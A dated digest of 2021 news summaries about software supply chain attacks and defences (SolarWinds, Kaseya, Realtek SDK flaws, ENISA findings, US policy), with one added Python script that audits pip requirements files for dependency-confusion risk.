Instead of the one-by-one approach to patching, security professionals need to start thinking about securing entire classes of vulnerabilities. It’s true that there is no current catch-all mechanism for such efficient action. But researchers can begin to work together to create methodologies that enable security organizations to better prioritize vulnerability risk management (VRM) instead of filing each one away to patch at a later date.

Ref - Rapid7 

_______________________________________________________________________________________

(Sept 7, 2021)

Combatting defense supply chain and critical infrastructure vulnerability with AI

Assessing defense supply chain risk boils down to understanding the relationships of the contracting organizations that support the government’s mission. Using advanced technology, including artificial intelligence and machine learning processes, supply chains can be mapped and potential gaps or pain points identified, from connections with sanctioned parties and adversary-controlled entities to distribution bottlenecks and sole-source suppliers.

Ref - NextGov 

_______________________________________________________________________________________

(Sept 4, 2021)

Microsoft says Chinese hackers were behind SolarWinds Serv-U SSH 0-day attack

Microsoft has shared technical details about a now-fixed, actively exploited critical security vulnerability affecting SolarWinds Serv-U managed file transfer service that it has attributed with "high confidence" to a threat actor operating out of China. In mid-July, the Texas-based company remedied a remote code execution flaw (CVE-2021-35211) that was rooted in Serv-U's implementation of the Secure Shell (SSH) protocol.


_______________________________________________________________________________________

(Sept 2, 2021)

Autodesk was one of the 18,000 firms breached in SolarWinds attack

Autodesk, maker of computer-aided design (CAD) software for manufacturing, has told the US stock market it was targeted as part of the supply chain attack on SolarWinds' Orion software. In a filing with the U.S. Securities and Exchange Commission (SEC), Autodesk said it had identified a compromised server in the wake of public reporting of the SolarWinds breach.

Ref - The Register 

_______________________________________________________________________________________

(Sept 2, 2021)

What Biden’s cybersecurity executive order means for supply chain attacks

One major outcome of the executive order is baselining. People may disagree what would constitute ‘critical’, but at least there is a formal definition in the books now. Critical software as mentioned in the executive order is defined as any software that has, or has direct software dependencies upon, one or more components with at least one of the given attributes.


_______________________________________________________________________________________

(Sept 2, 2021)

A deep-dive into the SolarWinds Serv-U SSH vulnerability

Several weeks ago, Microsoft detected a 0-day remote code execution exploit being used to attack the SolarWinds Serv-U FTP software in limited and targeted attacks. The Microsoft Threat Intelligence Center (MSTIC) attributed the attack with high confidence to DEV-0322, a group operating out of China, based on observed victimology, tactics, and procedures.

Ref - Microsoft
 
_______________________________________________________________________________________

(Sept 1, 2021)

How to stop supply chain attacks in their tracks

While agencies like the FBI and CISA have been warning for some time that MSPs are likely targets of advanced persistent threats (APTs), the Kaseya attack seems to have crossed a threshold. The problem is a significant security challenge, and one that some think only vendors can solve.


_______________________________________________________________________________________

(Aug 31, 2021)

A data breach may be lurking in your software supply chain

The software supply chain is clearly an increasing target for intrusion. And that’s exactly where a lot of sensitive data resides. The unfortunate reality is that sensitive information in non-prod environments goes largely unprotected. Recent research shows 56% of enterprise customers don’t anonymize sensitive data in test environments.


_______________________________________________________________________________________

(Aug 31, 2021)

Cyberattacks use Office 365 to target supply chain

Supply chain attacks starting in Office 365 can take on many different forms. For instance, spear phishers can use a compromised Office 365 account to scout out a targeted employee’s ongoing emails. They can then use what they learn to go after vendors and suppliers with business email compromise fraud attacks.


_______________________________________________________________________________________

(Aug 30, 2021)

How executive order requirements will change the scope of business

It is anticipated that the technical requirements under the EO will be applied broadly across the software industry. Each software vendor will have to compete commercially alongside the companies that are directly subject to the EO’s rules. Failing to meet the increased security and transparency requirements that the EO will impose will, for many, translate into a competitive disadvantage in the marketplace.


_______________________________________________________________________________________

(Aug 30, 2021)

How to fix the weakest link in cyber security

Many small and medium-sized businesses (SMBs) might think they are immune from cyber attacks. However, recent research shows that is no longer the case. Almost a third (28%) of data breaches in 2020 involved small businesses, and more than 22% of SMBs have suffered a security breach due to a remote worker since the beginning of the COVID-19 outbreak.

Ref - IT Pro

_______________________________________________________________________________________

(Aug 27, 2021)

Supply chain cyber security is only as strong as the weakest link

A primary method used by criminals to attack supply chains is impersonation, which can be remarkably sophisticated. Cybercriminals can spend months stalking employees’ social media accounts and company press releases in order to work out details of a supply chain, deducing where they might insert themselves to fraudulently divert invoices or encourage employees to engage with phishing scams.


_______________________________________________________________________________________

(Aug 27, 2021)

A new threat is coming from inside Docker container images

Aqua Security's threat research arm, Team Nautilus, has found five images accounting for a whopping 120,000 pulls by unsuspecting users. Team Nautilus is further warning that the malicious Docker images could be part of a larger software supply chain attack with its eyes on disrupting cloud-native environments.


_______________________________________________________________________________________

(Aug 27, 2021)

Cyber experts seek clarity on the NIST supply chain framework

Cyber experts agree a technology supply chain security framework developed by the National Institute of Standards and Technology will be a useful tool for agencies and industry. They are less sure about what it will look like. The prevailing theory is the new framework will focus primarily on the software supply chain —in light of the recent Microsoft Exchange server attacks, the Kaseya ransomware attack, and the SolarWinds breach.

Ref - Fed Scoop 

_______________________________________________________________________________________

(Aug 26, 2021)

White House unveils supply chain, new security initiatives

The Biden administration unveiled a new package of supply chain and critical infrastructure security initiatives following a meeting at the White House with about 25 tech, banking, insurance, and infrastructure executives. The initiatives feature a pledge by several companies, including tech giants Microsoft, Google and IBM, and insurers Travelers and Coalition, and the U.S. NIST, to create a framework to build more security into the nation's technology supply chain to help ensure its integrity, according to a fact sheet released by the White House.


_______________________________________________________________________________________

(Aug 26, 2021)

Realtek flaw exposes dozens of brands to supply chain attacks

German security firm IoT Inspector reports that the Realtek bug, tracked as CVE-2021-35395, affects over 200 Wi-Fi and router products from 65 vendors, including Asus, Belkin, China Mobile, Compal, D-Link, LG, Logitec, Netgear, ZTE, and Zyxel. The flaw is located in a Realtek software development kit (SDK) and is currently under attack from a group using a variant of the IoT malware Mirai.

Ref - ZDNet 

_______________________________________________________________________________________

(Aug 26, 2021)

Cybersecurity professor works to close the door on hackers

Santiago Torres Arias, an assistant professor of electrical and computer engineering at Purdue, said a cumulative increase of 500% in the number of software supply chain compromises is giving hackers the weak link they need to attack a system. Torres Arias said that in supply chain security, hackers will search to find that one program in a chain of software that is vulnerable and hacks it.


_______________________________________________________________________________________

(Aug 26, 2021)

Apple: It's time to bolster supply chain security

Apple announced it will establish a new program to drive continuous security improvements throughout the technology supply chain. As part of that program, Apple will work with its suppliers - including more than 9,000 in the United States - to drive the mass adoption of multi-factor authentication, security training, vulnerability remediation, event logging, and incident response.


_______________________________________________________________________________________

(Aug 26, 2021)

Google - Updates on collaboration with NIST to secure the software supply chain

Google participated in President Biden’s White House Cyber Security Summit where it shared recommendations to advance the administration’s cybersecurity agenda. This included its commitment to invest $10 billion over the next five years to expand zero-trust programs, help secure the software supply chain, and enhance open-source security.

Ref - Google Blogs 

_______________________________________________________________________________________

(Aug 26, 2021)

Taking control of cyber attacks

Organizations, as well as supply chains, have been blind-sided with new, sophisticated, and frequent tactics, causing CXOs and IT teams to scramble for protection and remediation. It may seem that cyber adversaries are running with the ball unobstructed toward the end zone, but it’s time to block and tackle them before they get yet another touchdown. 

Ref - IBTimes 

_______________________________________________________________________________________

(Aug 26, 2021)

How does PCI DSS prevent supply-chain attacks

The PCI Council recognized the growing level of risk exposure and, in PCI DSS 3.2, highlighted the importance of managing and mitigating third-party risk. The requirement calls for measures that ensure compliance throughout the data supply chain.

Ref - ECCouncil 

_______________________________________________________________________________________

(Aug 25, 2021)

Apple, Microsoft and Amazon chiefs to meet Biden over critical infrastructure cyber attacks

US President Joe Biden has invited Apple CEO Tim Cook, Microsoft CEO Satya Nadella, and Amazon president and CEO Andy Jassy to the White House to discuss how the private sector can help combat ransomware and software supply chain attacks.

Ref - MSN

_______________________________________________________________________________________

(Aug 24, 2021)

Supply chain vulnerability in cloud connectivity platform threatens 83 Million IoT devices

A supply chain vulnerability in the ThroughTek “Kalay” network, a cloud-based communications platform used by an estimated 83 million Internet of Things (IoT) devices, could allow for remote compromise and control to include monitoring audio and video feeds and exposing passwords.

 
_______________________________________________________________________________________

(Aug 24, 2021)

Supply chain attacks - vendors are at risk

Supply chain attacks piggyback legitimate processes to gain uninhibited access into a business's ecosystem. This attack begins with infiltrating a vendor's security defenses. This process is usually much simpler than attacking a victim directly due to the unfortunate myopic cybersecurity practices of many vendors.

Ref - Upguard 

_______________________________________________________________________________________

(Aug 23, 2021)

SSDF: The Key to Defending Against Supply Chain Cyberattacks

One of the best modern ways to combat supply chain cyberattacks is to integrate a secure software development framework (SSDF) into a vendor’s software development life cycle (SDLC). The SSDF provides software vendors with a framework by which they can implement security measures and cut down on cyberattacks.

 
_______________________________________________________________________________________

(Aug 20, 2021)

A year of supply chain attacks: Ways to protect SDLC

Developers must make sure that any third-party components they use don’t have security or compliance gaps, such as an unpatched critical vulnerability, malware, or a misconfigured setting. Otherwise, their software can put employees and customers at risk of security and compliance breaches. The article adds that the lack of visibility into the makeup of commercial and open-source software can be improved with software bills of materials (SBOMs).

Ref - JFrog 

_______________________________________________________________________________________

(Aug 20, 2021)

How to protect supply chains from ransomware attacks

Supply chains critical to the energy, food, and IT infrastructures are increasingly at risk, and threat actors are coming up with more sophisticated ways to exploit vulnerabilities within these supply chains. Because of this, traditional cybersecurity tactics are no longer enough, and this applies not just to large and prominent organizations but to smaller businesses as well.


_______________________________________________________________________________________

(Aug 18, 2021)

Lifting the veil on cyber vulnerabilities in government supply chain pipelines

It is important that the security team should be helping to assess the safety of third-party additions to the tech stack, but decisions can be made based on a business need with little choice among solutions. At this point, it can be a trust exercise. Does the vendor care about security as much as your company does? And can the vendor actually assess the risks as only you could understand them, as well as the assets you need to protect?


_______________________________________________________________________________________

(Aug 18, 2021)

Supply chain attacks on IoT - Million+ devices are vulnerable

Taiwanese chip designer Realtek has warned of four recent vulnerabilities in three SDKs used in its Wi-Fi modules. Realtek also published an advisory regarding the flaws, which affect almost 200 products made by multiple vendors. The vulnerabilities allow remote access without authentication; they can also lead to denial of service and device crashes, allow injection of arbitrary commands, and ultimately give an attacker complete control of the device at its highest privilege level.

Ref - Medium

_______________________________________________________________________________________

(Aug 18, 2021)

Iranian hackers target several Israeli organizations with supply-chain attacks

IT and communication companies in Israel were at the center of a supply chain attack campaign spearheaded by an Iranian threat actor that involved impersonating the firms and their HR personnel to target victims with fake job offers. The attacks have been linked to a hacker group called Siamesekitten (aka Lyceum or Hexane) that has primarily singled out oil, gas, and telecom providers in the Middle East and in Africa since at least 2018.


_______________________________________________________________________________________

(Aug 18, 2021)

Software composition analysis can help protect the software supply chain

Protecting the software supply chain is a multifaceted challenge that includes code signing, identity and access management, policy, and software composition analysis (SCA). SCA has always played a role in protecting the software supply chain, historically by identifying vulnerabilities and licensing risks in open source libraries and advising security and development teams on upgrade paths.

Ref - Forrester

_______________________________________________________________________________________

(Aug 18, 2021)

Supply chain attacks are closing in on MSPs

Like a technology that advances through state-sponsored R&D but then becomes available to a wider public, recent supply chain attack techniques were honed by state-backed actors but have now been adopted by more run-of-the-mill ransomware actors. This is bad news for MSPs. While agencies like the FBI and CISA have been warning for some time that MSPs are likely targets of advanced persistent threats (APTs), the Kaseya attack seems to have crossed a threshold.

Ref - Webroot 

_______________________________________________________________________________________

(Aug 17, 2021)

How to accelerate U.S. supply chain and security innovation

Dr. Tommy Gardner, Chief Technology Officer of HP Federal, believes a proactive mindset that bridges the digital divide, recruits top talent and implements the right policies is needed for the U.S. to achieve success and remain competitive on a global scale. According to him, a national strategy for critical technologies can shape the industries of the future as well as address national security and global challenges.

 
_______________________________________________________________________________________

(Aug 16, 2021)

ENISA predicts fourfold increase in software supply chain attacks in 2021

The European Union Cybersecurity Agency (ENISA) warns of increasing supply chain attacks in 2021 as advanced persistent threat actors (APTs) employ techniques more sophisticated than those seen in conventional targeted attacks. The agency studied 24 supply chain attacks from January 2020 to July 2021 and found that strong security protection is no longer effective in defending against these forms of cyber-attacks.

Ref - CPO Magazine 

_______________________________________________________________________________________

(Aug 16, 2021)

5 Ways to defend against supply chain cyberattacks

Security Intelligence recommends five keys to start proactively reducing supply chain attack risk: inform developers about cyberattacks, monitor open-source projects, implement zero trust, use built-in data protection, and focus on third-party risks.


_______________________________________________________________________________________

(Aug 16, 2021)

Devices from many vendors can be hacked remotely due to flaws in Realtek SDK

A large number of IoT systems could be exposed to remote hacker attacks due to serious vulnerabilities found in software development kits (SDKs) provided to device manufacturers by Taiwan-based semiconductor company Realtek. The list of impacted manufacturers and vendors includes ASUS, Belkin, D-Link, Huawei, LG, Logitech, Netgear, ZTE, and Zyxel.


_______________________________________________________________________________________

(Aug 16, 2021)

Do open-source supply chains leave security gaps in organizations?

Infiltrating open source libraries can also be a more covert approach than directly attacking organizations: if a library is already part of a trusted supply chain, its malicious activity is far less likely to be detected. Attacking an organization directly is tricky and will typically be harder and yield slower and fewer results.


_______________________________________________________________________________________

(Aug 16, 2021)

Companies need to finally embrace zero-trust

The industry has long viewed patching as a best practice and fundamental to any mature approach to cybersecurity. But what incidents like SolarWinds, Exchange, and Colonial Pipeline taught us was that organizations need to supplement their detection-based cybersecurity solutions – endpoint detection and response (EDR) and firewalls – and reactive patching with a proactive cybersecurity framework that fills the gap in the middle.


_______________________________________________________________________________________

(Aug 14, 2021)

Software’s supply chain security problem

Software supply chain attacks break the current model of cybersecurity. “Trusted” partners have now become an increasing source of risk and compromise. Attacks can involve whitelisted, or perceived legitimate, software that passes basic and advanced security checks. Such attacks can carry valid digital signatures or code signing, a perceived “stamp of approval” from the vendor that the backdoored software is legitimate.

Ref - Medium 

_______________________________________________________________________________________

(Aug 13, 2021)

SolarWinds 2.0 could ignite financial crisis

“This incident confirms that the next great financial crisis could come from a cyberattack,” superintendent of financial services Linda A. Lacewell said in a press release following the DFS’ investigation of New York’s financial services industry’s response to the supply-chain attack. Seeing hackers get access to thousands of organizations in one stroke underscores that cyberattacks threaten not just individual companies but also the stability of the financial industry as a whole.


_______________________________________________________________________________________

(Aug 13, 2021)

Supply chain attacks using container images

Aqua Security’s threat research team has uncovered several supply chain attacks that use malicious container images to compromise their victim. These five container images were found on Docker Hub. The images hijack organizations’ resources to mine cryptocurrency and can be used as part of a supply chain attack targeting cloud native environments.

Ref - AquaSec 

_______________________________________________________________________________________

(Aug 12, 2021)

How do supply chain attacks work?

Supply chain attacks are a new type of threat targeting software developers and suppliers. The goal is to access source code, build processes, or update mechanisms by infecting legitimate apps to distribute malware. Attackers look for insecure network protocols, unprotected server infrastructure, and insecure coding practices. They break in, change source code, and hide malware in build and update processes.

Ref - Microsoft 

_______________________________________________________________________________________

(Aug 12, 2021)

Most supply chain attacks target supplier’s code

According to the European Union Agency for Cybersecurity’s (ENISA) Threat Landscape for Supply Chain Attacks, 62% of supply chain attacks use malware as a technique. The report examined 24 supply chain attacks documented from January 2020 to early 2021. About 50% of the attacks were attributed to well-known Advanced Persistent Threat (APT) groups by the security community. The report also mentioned that strong security protection is no longer adequate for enterprises when attackers have already targeted suppliers. 

Ref - Trend Micro 

_______________________________________________________________________________________

(Aug 12, 2021)

12-Year-old router vulnerability discovered exposing millions of devices for supply chain risks

Tenable security researchers discovered a 12-year-old router vulnerability that could allow an attacker to bypass authentication and enable a root BusyBox shell on telnet. The path traversal vulnerability CVE-2021-20090 originates in Arcadyan’s firmware, which is used in various router brands. The vulnerability exists in the supply chain of at least 20 models from at least 17 vendors in 11 countries, including the U.S., Japan, Germany, Australia, Mexico, and New Zealand.

Ref - CPO Magazine 

_______________________________________________________________________________________

(Aug 12, 2021)

Current Security Trends - software supply chain on radar

There are three areas executives can focus on to increase visibility into software supply chain security and help prevent breaches: a leap to DevSecOps, gaining software transparency, and embracing a continuous security culture.

Ref - Forbes 

_______________________________________________________________________________________

(Aug 12, 2021)

Supply chain is the target for cybercriminals

The 2021 Webroot BrightCloud threat report has confirmed what many in the managed services world already know – that they are firmly in the sights of malware attacks. The management of companies and enterprises industry has shown the most significant increase in malware infections – 57% versus the global average. This highlights the fact that technology supply chains are under attack.


_______________________________________________________________________________________

(Aug 11, 2021)

Threat alert: Supply chain attacks using container images

Team Nautilus, Aqua Security’s threat research team, has uncovered several supply chain attacks that use malicious container images to compromise their victims. These five container images were found on Docker Hub, which Aqua scans daily for signs of malicious activity. The images hijack organizations’ resources to mine cryptocurrency and can be used as part of a supply chain attack targeting cloud native environments.

Ref - AquaSec

_______________________________________________________________________________________

(Aug 10, 2021)

Black Hat 2021: Zero-days, ransoms, and supply chains

During Black Hat 2021, Corellium COO Matt Tait highlighted that there was a significant rise in the number of zero-days identified and exploited in the wild, stolen zero-days, and supply chain assaults. Tait described supply chain assaults as a whole different type of cybercrime danger. The entire economics of mass exploitation, he explains, is turned upside down because of supply chain attacks. 


_______________________________________________________________________________________

(Aug 10, 2021)

Cyber-industry needs to get back to basics

There needs to be a much greater emphasis on getting the basics right in cybersecurity, according to Robert Hannigan, chairman of BlueVoyant, speaking during his keynote address on day one of the Infosecurity Europe virtual conference, which took place from 13-15 July 2021. While the most critical vendors are generally the focus for large businesses, the less well-known suppliers in the ecosystem are typically the most vulnerable, because such a supplier might be a small company with one person doing cybersecurity, if anyone.

 
_______________________________________________________________________________________

(Aug 9, 2021)

3 Strategies to secure the digital supply chain

Corporate leaders and IT teams can take three steps to prioritize and remediate vulnerabilities and forestall supply chain cyberattacks. IT managers should rely more on automated tools to fix simple vulnerabilities. Businesses should conduct a cost-benefit analysis for vulnerability patching. And thirdly, procurers should demand that critical technology vendors implement “hot patching.”

Ref - HBR

_______________________________________________________________________________________

(Aug 9, 2021)

How to strengthen supply chain security

As demonstrated by the recent ransomware cybersecurity attacks, everyone suffers when a supply chain is compromised: buyers, suppliers, and users. The pace and magnitude of these and other attacks are increasing. It is clear that supply chain security needs strong oversight and control to ensure security.


_______________________________________________________________________________________

(Aug 9, 2021)

Kaseya could be the turning point for supply chain attacks

In the aftermath of Kaseya, the industry has been reminded that complacency can exact a terrible price. With the risk of harm no longer limited to sprawling enterprises with deep pockets, the incident should trigger new security discussions across IT departments of every size.


_______________________________________________________________________________________

(Aug 9, 2021)

Takeaways on the state of OT security and the cyber supply chain

Ensuring the integrity of the cyber supply chain is a significant challenge for OT security professionals. Supply chains continue to grow, and a recent survey indicates that organizations have an average of 27 third parties as part of their cyber supply chains, which span across different types of IT providers, OT providers, and channel partners. Many of these third parties have access to internal assets, a fact that has serious security implications. 

Ref - Fortinet 

_______________________________________________________________________________________

(Aug 9, 2021)

Kaseya VSA ransomware attack: A bombshell supply-chain hit

Large ransomware and similar attacks are promulgated and perpetuated by hackers through third-party vendors critical to infrastructure and/or business operations. It is important to manage risk from third-party vendors by establishing a risk management process and a baseline for secure operations. Essentially, that means developing and maintaining a risk register using standards-based assessments (NIST, ISO, SIG, CAIQ).


_______________________________________________________________________________________

(Aug 7, 2021)

11 Tactics to prevent supply chain attacks

Even though the SolarWinds breach was the most sophisticated cyberattack in history, there are still defense tactics organizations can implement to significantly strengthen the digital supply chain. These include deploying honeytokens, securing privileged access management, implementing a zero trust architecture, identifying all potential insider threats, and protecting vulnerable resources.

Ref - Upguard

_______________________________________________________________________________________

(Aug 6, 2021)

Protecting Canada's energy supply chains from cyber threats

The Honourable Seamus O'Regan Jr., Minister of Natural Resources, today announced $407,000 in funding for the University of Waterloo to develop an enhanced cybersecurity system to protect Canada's critical energy infrastructure. The innovative hardware assurance system will be developed by the University of Waterloo and can detect compromised parts and devices, ensuring the safety and reliability of Canada's energy delivery by mitigating risks in its supply chain.

Ref - Yahoo 

_______________________________________________________________________________________

(Aug 6, 2021)

Norsk Hydro’s hack highlights the need for supply chain cybersecurity

According to a recent report, when Norsk Hydro was targeted by a cyberattack in 2019, instead of paying the hackers who held its thousands of servers and PCs hostage, the company decided to consult cybersecurity experts to inspect 30,000 employee credentials and get to the root of the attack. The final culprit? An employee had opened an infected email. This approach may have left Norsk Hydro in a better position to fend off future supply-chain hacks, but it still cost the company over $70 million. It also taught them, and can teach other organizations, a valuable lesson: be prepared.


_______________________________________________________________________________________

(Aug 5, 2021)

Why you should be worried about your supply chain vendors

Software supply chain attacks target either the source code, update mechanism, or build processes of vendor software. A victim could be compromised through several vectors, including third-party software updates, malware installed on connected devices (for example, external hard drives, cameras, and phones), and application installers.

Ref - Upguard 

_______________________________________________________________________________________

(Aug 5, 2021)

DevOps tools proliferation – A whole new world of vulnerabilities and supply chain attacks

The recent series of supply chain attacks affected tens of thousands of companies. Nowadays, CI/CD pipelines form the backbone of modern-day DevOps operations, and as this trend continues, we cannot ignore the urgency of protecting customers’ development environments from these pervasive attacks.


_______________________________________________________________________________________

(Aug 5, 2021)

Supply chain attacks are destined to escalate

The only way to minimize supply chain attacks is for software platform vendors to fix the underlying technology. International or national governments can't solve the issue; platform vendors have to step in. For Windows, that means tightening user privileges to the level developers actually need, so that if an app gets compromised, the malware's impact is reduced.

Ref - DarkReading 

_______________________________________________________________________________________

(Aug 5, 2021)

Supply chain security remains a key puzzle

Malicious actors have successfully exploited DNS vulnerabilities on three major cloud providers, including AWS Route 53. “The root cause of the problem is the non-standard implementation of DNS resolvers that, when coupled with specific unintended edge cases on the DNS service provider’s side, cause major information leakage from internal corporate networks.”

Ref - Toolbox

_______________________________________________________________________________________

(Aug 4, 2021)

Major supply chain attacks in 2021

This year alone, there have been several newsworthy attacks that deserve some attention. Kaseya and SolarWinds have been covered ad nauseam at this point, so instead we’ll pull together a couple of other significant case studies to walk you through what we know now after time has passed and hopefully glean some lessons from them.


_______________________________________________________________________________________

(Aug 4, 2021)

Detecting and managing supply chain cyber risk

To actively manage supply chain risks, recommendations such as using trusted networks, information sharing, scenario planning, and quantification metrics have been broadly accepted by organizations as reputed as the World Economic Forum. These may be true, but don’t solve the problem unless deployed by all stakeholders – and that’s a tall order. A rising tide of improved risk management must start from within.

Ref - TrustWave 

_______________________________________________________________________________________

(Aug 4, 2021)

Supply chain attacks from a managed detection and response perspective

Supply chain attacks are difficult to track because the targeted organizations often do not have full access to what’s going on security-wise with their supply chain partners. This can often be exacerbated by security lapses within the company itself. Even if third-party vendors are known to be trustworthy, security precautions should still be deployed in case there are compromised accounts or even insider threats.

 
_______________________________________________________________________________________

(Aug 4, 2021)

Supply chain attacks, IoT threats on tap for Black Hat 2021

The 2020 SolarWinds attack, in which software updates for the Orion IT management platform were poisoned, brought the idea of supply chain infections into the public light. When combined with the rise in sophisticated ransomware gangs, supply chain attacks could well become the most dangerous threat facing enterprises.


_______________________________________________________________________________________

(Aug 4, 2021)

Protecting SMBs against Kaseya supply chain, zero-day, and ransomware attacks

To breach on-premises Kaseya VSA servers, REvil used a zero-day vulnerability that was in the process of being fixed. The vulnerability had been previously disclosed to Kaseya by security researchers from the Dutch Institute for Vulnerability Disclosure, and Kaseya was validating the patch before rolling it out to customers. However, the REvil ransomware gang was one step ahead of Kaseya and used the vulnerability to carry out their attack.

Ref - Check Point 

_______________________________________________________________________________________

(Aug 4, 2021)

Supply chain attacks and mass compromises are changing vendor relationships

Supply chain attacks can dramatically simplify the work that threat actors have to do around target selection, scanning the attack surface, privilege escalation, and lateral movement, all of which are often harder, more complex, and costlier in more traditional or targeted intrusions.

Ref - SC Magazine 

_______________________________________________________________________________________

(Aug 3, 2021)

Four-fold increase in software supply chain attacks predicted in 2021 – report

The European Union has forecast there will be four times more software supply chain attacks in 2021 than there were in 2020, as cybercriminals shift to larger, cross-border targets. Among the findings, ENISA revealed that around 50% of the supply chain attacks studied were attributed to known APT groups, while 42% were not attributed to a particular source.

Ref - PortSwigger 

_______________________________________________________________________________________

(Aug 3, 2021)

What constitutes a software supply chain attack?

It’s important to remember that dependency hijacking or namespace confusion attacks occur automatically and without relying on a developer making a typographical error. This occurs as soon as a malicious dependency is pulled into the developer’s build. Dismissing these incidents as not a software supply chain issue because they lack a major security outcome isn’t wise.

Ref - SonaType 
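Because a confusable dependency is pulled in automatically, the practical defense is to audit how packages are resolved before a build runs. The following is an added example (not code from the page or from Sonatype) that checks a pip requirements file for the conditions that make dependency confusion possible: an extra index that lets pip fall back to the public repository, and internal packages that are not pinned or hash-locked. The internal package names, the sample requirements text, and the hash values are constructed placeholders.

```python
"""Audit a pip requirements file for dependency-confusion exposure.

Added example, not code from the page or from Sonatype. The internal
package names and the sample requirements text are constructed for
illustration; a real project would load both from its own sources.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed: package names that exist only on the company's private index.
INTERNAL_PACKAGES = {"acme-billing", "acme_auth_core", "acme-telemetry"}

# Constructed sample requirements file (hash values are placeholders).
SAMPLE_REQUIREMENTS = """\
--extra-index-url https://pypi.internal.example/simple
requests==2.31.0 --hash=sha256:PLACEHOLDER-HASH
acme-billing>=1.2
acme_auth_core==3.0.1
acme-telemetry==0.9.0 --hash=sha256:PLACEHOLDER-HASH
numpy
"""

# A requirement line: project name, optionally followed by an exact (==) pin.
REQ_RE = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)\s*(==[^\s;]+)?")


def normalize(name: str) -> str:
    """PEP 503 name normalisation: case-insensitive, runs of '-', '_', '.' collapse to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


@dataclass(frozen=True)
class Finding:
    line: str
    reason: str


def audit(requirements: str, internal: set[str]) -> list[Finding]:
    """Return one Finding per risky requirements line.

    Checks performed:
    * --extra-index-url: pip merges the public index with the private one and
      installs the highest version it finds, which is exactly the mechanism a
      confusable package abuses; a single --index-url pointing at a private
      proxy that mirrors public packages removes the public fallback.
    * An internal package without an exact pin or without --hash can be
      replaced by a higher-versioned upload on the public index.
    * An unpinned public package drifts between builds and is not reproducible.
    """
    internal_norm = {normalize(n) for n in internal}
    findings: list[Finding] = []
    for raw in requirements.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("--extra-index-url"):
            findings.append(Finding(line, "extra index allows public fallback; use a single --index-url"))
            continue
        if line.startswith("-"):
            continue  # other pip options are out of scope for this check
        match = REQ_RE.match(line)
        if not match:
            continue
        name = normalize(match.group(1))
        pinned = match.group(2) is not None
        hashed = "--hash=" in line
        if name in internal_norm:
            if not pinned:
                findings.append(Finding(line, "internal package not pinned to an exact version"))
            if not hashed:
                findings.append(Finding(line, "internal package has no --hash"))
        elif not pinned:
            findings.append(Finding(line, "public package not pinned"))
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_REQUIREMENTS, INTERNAL_PACKAGES):
        print(f"{finding.reason}: {finding.line}")
```

Run it in a CI step before `pip install` and fail the build on any finding. The name normalisation matters: `acme_auth_core` and `Acme-Auth.Core` are the same project to the index, so an allowlist compared without normalising would miss it.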

_______________________________________________________________________________________

(Aug 3, 2021)

Supply chain attacks are getting worse, and you are not ready for them

The European Union Agency for Cybersecurity (ENISA) has analyzed 24 recent software supply chain attacks and concluded that strong security protection is no longer enough. It notes that 11 of the supply chain attacks were conducted by known APT groups. ENISA focuses on APT supply chain attacks and notes that while the code, exploits, and malware were not considered "advanced", the planning, staging, and execution were complex tasks.

Ref - ZDNet 

_______________________________________________________________________________________

(Aug 3, 2021)

Constant review of third-party security is critical as ransomware threat climbs

Lulled into complacency, businesses face risks of supply chain attacks even after they have done their due diligence in assessing their third-party suppliers' security posture before establishing a partnership. There is a need for continuous review of all touchpoints across their supply chain, especially those involving critical systems and data.

Ref - ZDNet

_______________________________________________________________________________________

(Aug 2, 2021)

CISA announces renewal of the ICT supply chain risk management task force

CISA has announced the extension of the Information and Communications Technology (ICT) Supply Chain Risk Management (SCRM) Task Force to July 31, 2023. The Task Force, chaired by CISA and the IT and Communications Sector Coordinating Councils, is a public-private partnership composed of a diverse range of representatives from large and small private sector organizations charged with identifying challenges and devising workable solutions and recommendations for managing risks to the global ICT supply chain.

Ref - CISA

_______________________________________________________________________________________

(Aug 2, 2021)

PyPI Python package repository patches critical supply chain flaw

The maintainers of Python Package Index (PyPI) last week issued fixes for three vulnerabilities, one among which could be abused to achieve arbitrary code execution and take full control of the official third-party software repository. The security weaknesses were discovered and reported by Japanese security researcher RyotaK.

 
_______________________________________________________________________________________

(Aug 2, 2021)

Today’s supply chain attacks are changing enterprise security

Analysis of several recent examples of supply chain attacks shows that adversaries are often either manipulating code signing procedures via compromised but legitimate code-signing certificates, hijacking the update distribution network of an ISV solution, or compromising original source code. The majority of the attackers have a high sophistication level, with the exception of the recent Kaseya attack, which leveraged an external-facing service with known vulnerabilities.

Ref - SentinelOne 

_______________________________________________________________________________________

(Aug 2, 2021)

The supply chain effect in increasingly connected world

Larger supply chains are a consequence of our increasingly connected world, and feature in almost every industry from vehicle manufacturing to dairy companies. Supply chain interruptions and cyber-attacks that propagate through vendor-customer relations show that there are plenty of concerns due to the lack of accounting for the increasingly complex interconnected systems that make up our society.

Ref - Medium

_______________________________________________________________________________________

(Aug 2, 2021)

Supply chain cyber attacks expected to quadruple, says EU agency

The European Union Agency for Cybersecurity (ENISA) has found that 66 percent of supply chain attacks focus on the supplier’s code. ENISA says strong security protection is no longer enough for organizations when attackers have already shifted their attention to suppliers. This is evidenced by the increasing impact of these attacks such as downtime of systems, monetary loss and reputational damage.


_______________________________________________________________________________________

(August 1, 2021)

Top US prosecutors hit by suspected Russian hack

The attack on users of the software SolarWinds - which the US has blamed on Russia - was the worst-ever cyber-espionage attack on the US government. The department says 27 US attorneys had at least one office computer hacked. That has raised fears the hackers may have accessed sensitive information, including the names of informants.

Ref - BBC

_______________________________________________________________________________________

(July 31, 2021)

Organizations should validate third-party code before using it - Euro body

Half of the publicly reported supply-chain attacks were carried out by well-known APT groups, according to an analysis by EU infosec agency ENISA, which warned that such attacks need to drive new protective methods. Of the 24 supply-chain attacks studied by ENISA since January 2020, a dozen were attributed to APTs while 10 of them hadn't been attributed to anyone at all in open-source reporting, the agency said.

Ref - The Register 

_______________________________________________________________________________________

(July 30, 2021)

Ransomware exploits and supply chain attacks lead the cyber trends in the H1 2021

Global cyber attacks increased by 29%, as hackers continue to exploit the COVID-19 pandemic and shift to remote work. The well-known SolarWinds supply chain attack stands out in 2021 due to its scale and influence, but other sophisticated supply chain attacks have occurred such as Codecov in April, and most recently, Kaseya.

Ref - Check Point 

_______________________________________________________________________________________

(July 30, 2021)

There is no silver bullet for ransomware or supply chain attacks

